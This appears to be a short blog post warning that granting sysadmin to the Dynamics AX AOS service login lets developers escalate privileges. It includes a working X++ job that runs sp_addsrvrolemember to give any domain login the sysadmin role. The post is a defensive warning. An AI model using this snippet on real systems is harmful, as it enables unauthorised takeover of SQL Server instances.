Dynamics AX AOS service login require only a few access and this would prevent developer doing some funny thing around the database. But sometimes when DBA doesn't give a throughout thought on it, it might cause security issue.
Eg.
DBA is requested to look at an AOS start up issue, rather than checking and fixing it properly, a sysadmin role is granted to the AOS service login as a quick fix. Sometimes under urgency or pressure, this might be a quick fix, but it would cause security risk issue. Although this role is granted only to the AOS service login, but developer with AOT access can issue a direct SQL statement to grant themselves the sysadmin role now.
Running the job below would grant the sysadmin role.
static void UpdateSQL(Args _args)
{
str sql;
Connection connection = new Connection();
SqlStatementExecutePermission sqlPerm;
Statement statement;
int rowsAffected;
;
try
{
sql = "EXEC master..sp_addsrvrolemember @loginame = N'Domain\\Username', @rolename = N'sysadmin'";
sqlPerm = new SqlStatementExecutePermission(sql);
sqlPerm.assert();
statement = connection.createStatement();
rowsAffected = statement.executeUpdate(sql);
CodeAccessPermission::revertAssert();
}
catch
{
}
}